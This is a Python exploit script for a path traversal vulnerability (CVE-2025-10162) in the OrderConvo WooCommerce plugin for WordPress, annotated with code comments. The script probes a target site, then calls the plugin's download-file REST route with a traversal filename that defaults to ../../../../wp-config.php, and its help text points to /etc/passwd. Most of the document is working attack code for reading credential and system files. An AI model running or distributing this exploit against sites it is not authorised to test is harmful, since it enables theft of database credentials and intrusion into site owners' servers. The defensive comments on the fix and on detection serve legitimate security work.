# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162
import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys
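async def main(base_url, file):
    """Check that *base_url* answers, then request *file* through the plugin's
    ``download-file`` REST route and print whatever the server returns.

    Args:
        base_url: Root URL of the WordPress site, e.g. ``https://test.local``.
            ``urljoin()`` replaces the last path segment of this value, so a site
            served under a sub-path must be given with a trailing slash.
        file: Value sent as the ``filename`` query parameter; the script's
            default is a traversal sequence (see the argument parser).

    Exits the process with status 1 when the target cannot be reached or does
    not answer 200 on the base URL.
    """
    # verify=False turns off TLS certificate validation for every request the
    # client sends; the original author chose this, it is kept unchanged here.
    async with httpx.AsyncClient(verify=False) as client:
        print('[*] Checking connection to target')
        try:
            req = await client.get(url=base_url)
        except (httpx.HTTPError, httpx.InvalidURL):
            # Narrow handler: the original bare ``except:`` also caught the
            # SystemExit raised inside the try body, so a non-200 answer printed
            # the connection-error message instead of the status-code message.
            print('[-] Problem with connection to the target.')
            sys.exit(1)
        if req.status_code != 200:
            print(f'[-] Unable to connect to the target. Code: {req.status_code}')
            sys.exit(1)
        print('[+] The target is alive, exploiting\n')
        # The route takes ``filename`` straight from the query string; the
        # traversal default relies on the plugin not confining that value to
        # its intended directory (CVE-2025-10162). The fix on the plugin side
        # is to resolve the path and reject anything outside that directory;
        # on the defender side, requests to this route whose ``filename``
        # contains ``../`` are the thing to alert on.
        exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
        r = await client.get(url=exp_url)
        if len(r.text) != 0:
            print(r.text)
        else:
            print("[*] Unable to read file")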
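# Command-line interface. The parser is built at import time (so it can be
# inspected or tested), but the arguments are only parsed under the
# ``__main__`` guard: the original called ``parse_args()`` at module level,
# which made the file un-importable because argparse exits when ``-u`` is missing.
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")

if __name__ == '__main__':
    args = parser.parse_args()
    asyncio.run(main(args.url, args.filename))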